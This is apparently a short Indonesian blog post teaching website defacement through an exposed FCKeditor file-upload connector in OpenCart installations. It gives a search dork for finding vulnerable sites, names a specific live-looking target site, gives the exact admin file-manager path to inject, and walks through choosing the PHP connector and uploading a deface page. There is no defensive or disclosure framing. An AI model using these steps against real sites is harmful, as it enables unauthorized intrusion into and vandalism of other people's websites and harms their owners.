Ok sekarang kita akan belajar men deface web dengan cara Remote File Upload Opencart lngsung aja...
dork : Powered By OpenCart site:com
"site:" terserah, yang penting support opencart
ex target: http://www.harleypartsintl.com/
bisa juga dgn trget www.target.com/pacth/ itu kalo dpt trget yg ad di /patch/ nya
ex: http://www.target.com/patch/
nah kalo dh dpt trget, lngsung aj kita inject exploitnya
kalo target yang ad /patch/ , inject nya d belakang patch nya
ex:www.target.com/patch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
liat yg kluar, dstu trdpat tmpat upload file nya.....
connector pilih PHP
lngsung aja kita upload file html deface kita...
jika berhasil mka akan kluar alert sprti ini
Code:
"file uploaded with no errors"
liat file kita , apkah telah d upload dgn mengklik "Get Folders and Files"
0 comments:
Post a Comment